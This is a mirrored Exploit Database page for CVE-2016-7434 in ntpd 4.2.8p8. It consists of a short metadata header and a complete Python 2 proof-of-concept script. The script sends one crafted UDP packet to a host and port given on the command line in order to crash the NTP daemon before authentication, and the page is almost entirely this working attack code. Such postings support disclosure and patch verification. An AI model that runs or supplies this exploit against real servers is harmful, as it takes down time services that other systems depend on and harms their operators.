NTP 4.2.8p8 – Denial of Service

• Exploit Database
• 16 阅读

• 作者： Magnus Klaaborg Stubman
  日期： 2016-11-21
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/40806/

• #!/usr/bin/env python
  
  # Exploit Title: ntpd remote pre-auth Denial of Service
  # Date: 2016-11-21
  # Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
  # Website: http://dumpco.re/cve-2016-7434/
  # Vendor Homepage: http://www.ntp.org/
  # Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p8.tar.gz
  # Version: ntp-4.2.7p22, up to but not including ntp-4.2.8p9, and ntp-4.3.0 up to, but not including ntp-4.3.94
  # CVE: CVE-2016-7434
  
  import sys
  import socket
  
  if len(sys.argv) != 3:
  print "usage: " + sys.argv[0] + " <host> <port>"
  sys.exit(-1)
  
  
  payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
  
  print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
  print "[+] Done!"